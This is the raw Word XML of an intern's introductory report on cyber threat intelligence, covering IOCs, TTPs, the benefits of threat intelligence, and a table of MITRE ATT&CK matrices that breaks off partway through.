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79F1B8" wp14:paraId="2C078E63" wp14:textId="7A5CD87C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="53C21A1D">
        <w:rPr/>
        <w:t>Proof Of Concept (POC) of Threat Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="405E3347" w:rsidP="3E79F1B8" w:rsidRDefault="405E3347" w14:paraId="43E2BF22" w14:textId="40404A5B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="405E3347">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>NAME: NIKHIL SAINI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="405E3347" w:rsidP="3E79F1B8" w:rsidRDefault="405E3347" w14:paraId="6768D052" w14:textId="03EB93DD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="405E3347">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Intern ID: 440</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4723563E" w:rsidRDefault="4723563E" w14:paraId="26F54250" w14:textId="0DA34DF1">
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="472356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Threat Intelligence</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="472356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</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="472356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of gathering, analyzing, and using information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current and potential cyber threats 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72356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prevent, detect, and respond to cyberattacks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effectively. It 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>provides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72356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contextual insights</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="472356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attackers, their tools, their behavior (TTPs), and their motives, so that security teams can make informed decisions to protect systems, networks, and data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="454BCC0A" w:rsidP="3E79F1B8" w:rsidRDefault="454BCC0A" w14:paraId="720D31E0" w14:textId="2CA0097D">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="454BCC0A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In simple terms:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="454BCC0A" w:rsidP="3E79F1B8" w:rsidRDefault="454BCC0A" w14:paraId="5D80061F" w14:textId="5C402C9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54BCC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Tactic = Why</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="454BCC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attacker is doing something (objective).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="454BCC0A" w:rsidP="3E79F1B8" w:rsidRDefault="454BCC0A" w14:paraId="3D438F5D" w14:textId="1A9CCF1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54BCC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 = How</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="454BCC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attacker is doing it (method).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="454BCC0A" w:rsidP="3E79F1B8" w:rsidRDefault="454BCC0A" w14:paraId="5BF35872" w14:textId="5F8AD33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79F1B8" w:rsidR="454BCC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Sub-technique = More specific 'how'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="454BCC0A" w:rsidP="3E79F1B8" w:rsidRDefault="454BCC0A" w14:paraId="0B2253F1" w14:textId="57EAEA1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79F1B8" w:rsidR="454BCC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 = Real-life example of that technique in action.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A2C1664" w:rsidP="3E79F1B8" w:rsidRDefault="6A2C1664" w14:paraId="12721D0A" w14:textId="53CD25F8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6A2C16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Elements of Threat Intelligence:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A2C1664" w:rsidP="3E79F1B8" w:rsidRDefault="6A2C1664" w14:paraId="63D39F0B" w14:textId="1D8C9A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A2C1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Indicators of Compromise (IOCs):</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6A2C16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Technical signs of an attack, like IP addresses, file hashes, URLs, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A2C1664" w:rsidP="3E79F1B8" w:rsidRDefault="6A2C1664" w14:paraId="3C8CB0EF" w14:textId="4A6C93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A2C1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Tactics, Techniques, and Procedures (TTPs):</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6A2C16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Behavioral patterns of attackers. MITRE ATT&amp;CK is based on these.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A2C1664" w:rsidP="3E79F1B8" w:rsidRDefault="6A2C1664" w14:paraId="3977E0BE" w14:textId="2BCA72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A2C1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Threat Actors:</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6A2C16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hackers, cybercriminal groups, or state-sponsored attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A2C1664" w:rsidP="3E79F1B8" w:rsidRDefault="6A2C1664" w14:paraId="6CBD3062" w14:textId="2DCFD7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A2C1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Motivations:</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="6A2C16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attackers are targeting specific organizations — financial gain, espionage, political disruption, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="156857E1" w14:textId="1757D0FF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off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Why Threat Intelligence Is Important</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="2B179218" w14:textId="67A885E8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Threat Intelligence plays a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role in modern cybersecurity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it helps organizations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understand the threat landscape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stay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step ahead of attackers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respond quickly and effectively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cyber incidents. Let’s explore this in detail:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="75374666" w14:textId="4F499CE4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Proactive Defense</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="10B1E592" w14:textId="1F5A7637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Traditional security systems are often reactive—they act only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attack occurs. Threat Intelligence allows an organization to be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by:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="03342F0F" w14:textId="1384F1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Identifying potential threats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strike.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="35A0DDF3" w14:textId="4EA71D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Blocking malicious IPs, domains, or files based on real-time threat feeds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="1497AC75" w14:textId="6928AD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Recognizing attack patterns and preparing countermeasures in advance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="5279C6CC" w14:textId="1199FC4C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 Better Detection of Threats</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="0B70E6C3" w14:textId="4B9A24CC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Threat Intelligence provides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contextual data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known and emerging attack techniques. This enables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="7CB13BAE" w14:textId="615BD50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Faster and more accurate detection of suspicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="7F55B629" w14:textId="04F98E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Reduction in false positives by understanding what </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1EBACE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really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looks dangerous.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="34866880" w14:textId="57D34A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Improved threat hunting by giving analysts a clear picture of attacker behavior (TTPs).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="2185F400" w14:textId="088D7543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 Faster Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="41114783" w14:textId="58B28384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When an attack does occur, Threat Intelligence:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="038CBC85" w14:textId="681C7FA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identify the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 of attack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attacker’s goals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EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="448CBBF1" w14:textId="17EE50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playbooks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case studies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guide response teams.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="6EC65693" w14:textId="23B5DC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Speeds up decision-making by showing which systems are at risk and how to contain the threat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="7C28E14D" w14:textId="047FF2A2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️ Improved Security Controls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="6E6E6E17" w14:textId="0FF6F2FD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With insights from threat intelligence, organizations can:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="0A057E05" w14:textId="6AB4A8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Update firewalls, antivirus, and intrusion detection systems (IDS/IPS) with the latest Indicators of Compromise (IOCs).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="1663091C" w14:textId="2A5AE0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or adjust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segmentation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protection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policies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="25D46AB7" w14:textId="734B2F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Tailor security training for employees based on the most common threats (e.g., phishing).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="35794476" w14:textId="1D5399F8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 Targeted and Informed Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="213EE2D7" w14:textId="54A53D1E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Every organization is different—and so are the threats they face. Threat Intelligence helps you:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="4FF14613" w14:textId="15B4480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Focus on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relevant threats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industries, regions, technologies targeted).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="32A79829" w14:textId="2244EEC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Avoid wasting resources on low-risk issues.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="50502EC8" w14:textId="4D89228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Prioritize risks that are most likely to affect your systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="2BF993AF" w14:textId="7E4AA379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 Understanding Adversaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="439775E3" w14:textId="691394E4">
      <w:pPr>
        <w:pStyle w:val="Heading3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Threat Intelligence helps security teams understand:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="1F328FBF" w14:textId="2C770D5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attackers are (cybercriminals, hacktivists, state-sponsored groups).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="752D6A70" w14:textId="69EFB4D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tools and techniques they use (malware, phishing, ransomware, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="5E023E9E" w14:textId="67B853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they’re targeting specific victims (e.g., money, espionage, data theft).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="48ED33E9" w14:textId="6E687B54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This knowledge is crucial for building long-term security strategies and defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="50EC2231" w14:textId="59E1611B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1EBACE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 Collaboration and Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="0CE9C69B" w14:textId="71EA265B">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Threat Intelligence also fosters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sharing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organizations, governments, and security communities. This:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="7F03D0B3" w14:textId="3373A05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>Helps smaller organizations benefit from large-scale threat research.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBACED1" w:rsidP="3E79F1B8" w:rsidRDefault="1EBACED1" w14:paraId="0ACF83A2" w14:textId="769C268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Creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1EBACE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collective defense</w:t>
      </w:r>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="1EBAC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everyone learns from each attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="60D3A83D" w14:textId="7BA4A15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E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="346D065A" w14:textId="1640DE96">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2E7E43D7" w:rsidP="3E79F1B8" w:rsidRDefault="2E7E43D7" w14:paraId="320D3050" w14:textId="7A1DC8B1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3E79F1B8" w:rsidR="2E7E4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All MITRE ATT&amp;CK Matrices with Explanations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2220"/>
        <w:gridCol w:w="2814"/>
        <w:gridCol w:w="3822"/>
      </w:tblGrid>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="34B65F81">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="5D0A7872" w14:textId="51577CA7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No.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7B2C18E1" w14:textId="0143210E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Matrix Name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631CAC2F" w14:textId="4CE86CB3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Domain / Environment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789BA97D" w14:textId="24207CDD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Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="57684933">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3EDDA9D9" w:rsidP="3E79F1B8" w:rsidRDefault="3EDDA9D9" w14:paraId="674869E0" w14:textId="636DC3CA">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3EDDA9D9">
              <w:rPr/>
              <w:t>1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75939ED3" w14:textId="7C4A124D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Enterprise ATT&amp;CK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0C39EE94" w14:textId="04A6C14A">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>IT (Windows, macOS, Linux, Cloud, SaaS)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428B5E59" w14:textId="114EB53C">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Primary matrix with 14 tactics covering attacks on traditional and cloud IT infrastructure.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="7DE868B0" w14:textId="4E64049F">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="7A282733">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="4ADE4851" w:rsidP="3E79F1B8" w:rsidRDefault="4ADE4851" w14:paraId="7665A3C5" w14:textId="1544AEA4">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="4ADE4851">
              <w:rPr/>
              <w:t>2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2EC108D7" w14:textId="5F1F7932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Mobile ATT&amp;CK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74B9B5A1" w14:textId="624621CE">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Mobile Devices (Android, iOS)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5879FD2C" w14:textId="6B8A63A0">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Focuses on threats targeting smartphones and tablets using the same 14 tactics as Enterprise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="4AD48ACF">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="16276A0C" w:rsidP="3E79F1B8" w:rsidRDefault="16276A0C" w14:paraId="38797B70" w14:textId="6A8E4517">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="16276A0C">
              <w:rPr/>
              <w:t>3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6F5E4CDC" w14:textId="2C460D12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ICS ATT&amp;CK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47A2E44C" w14:textId="69ACCC25">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Industrial Systems (SCADA, PLCs, HMIs)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23D65017" w14:textId="00E2D9DE">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="6F94F453" w14:textId="0C520715">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Models attacks on operational technology with 12 tactics including physical disruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="54B5D2C8">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="32198316" w:rsidP="3E79F1B8" w:rsidRDefault="32198316" w14:paraId="757752D7" w14:textId="4B52ADF4">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="32198316">
              <w:rPr/>
              <w:t>4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7A2986B1" w14:textId="3C60B7C4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PRE-ATT&amp;CK</w:t>
            </w:r>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="3E79F1B8" w:rsidR="3E79F1B8">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>(Retired)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2F75A5EA" w14:textId="0EFEC3A8">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Pre-Compromise Phase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3B7CC683" w14:textId="746A4928">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="17A73D31" w14:textId="56D0D666">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Covered pre-attack planning like OSINT, target profiling. Now merged into Recon &amp; Resource Dev.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="70E930DD">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="5A4E10C0" w:rsidP="3E79F1B8" w:rsidRDefault="5A4E10C0" w14:paraId="5DF4B232" w14:textId="1D27FFA2">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="5A4E10C0">
              <w:rPr/>
              <w:t>5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45DA1996" w14:textId="6A3B8162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MITRE ATLAS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185FE635" w14:textId="4935D924">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>AI/ML Systems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123992EA" w14:textId="28E12846">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="424C63EC" w14:textId="19113422">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Maps threats to machine learning, including model evasion, poisoning, and model theft.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="11ACFF6C">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="1E64170E" w:rsidP="3E79F1B8" w:rsidRDefault="1E64170E" w14:paraId="4885B75A" w14:textId="10E57947">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="1E64170E">
              <w:rPr/>
              <w:t>6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2445CEBC" w14:textId="51ADBCEC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Automotive Threat Matrix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08B162D3" w14:textId="5FC67D66">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Connected Vehicles (CAN, ECU, Telematics)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7F6E680E" w14:textId="27FEDBC2">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="28DBE3A8" w14:textId="5A845153">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Custom tactics for vehicle hacking such as firmware tampering or remote injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="4AC3AC57">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="3F7F3582" w:rsidP="3E79F1B8" w:rsidRDefault="3F7F3582" w14:paraId="6092DCED" w14:textId="189B125E">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3F7F3582">
              <w:rPr/>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>️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2EBCA4C1" w14:textId="17289828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Cloud Matrix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1C0CED0D" w14:textId="78232888">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>Cloud Platforms (AWS, Azure, GCP, SaaS)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7C285460" w14:textId="7F1B3B31">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="3E79F1B8" w:rsidP="3E79F1B8" w:rsidRDefault="3E79F1B8" w14:paraId="720BED17" w14:textId="4D0C8A8D">
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
            </w:pPr>
            <w:r w:rsidR="3E79F1B8">
              <w:rPr/>
              <w:t>ATT&amp;CK-style mapping of cloud-specific threats like IAM misuse and misconfigurations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3E79F1B8" w:rsidTr="3E79F1B8" w14:paraId="6B299160">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="4501516C" w:rsidP="3E79F1B8" w:rsidRDefault="4501516C" w14:paraId="6C7FFD3E" w14:textId="7C96200A">
            <w:pPr>
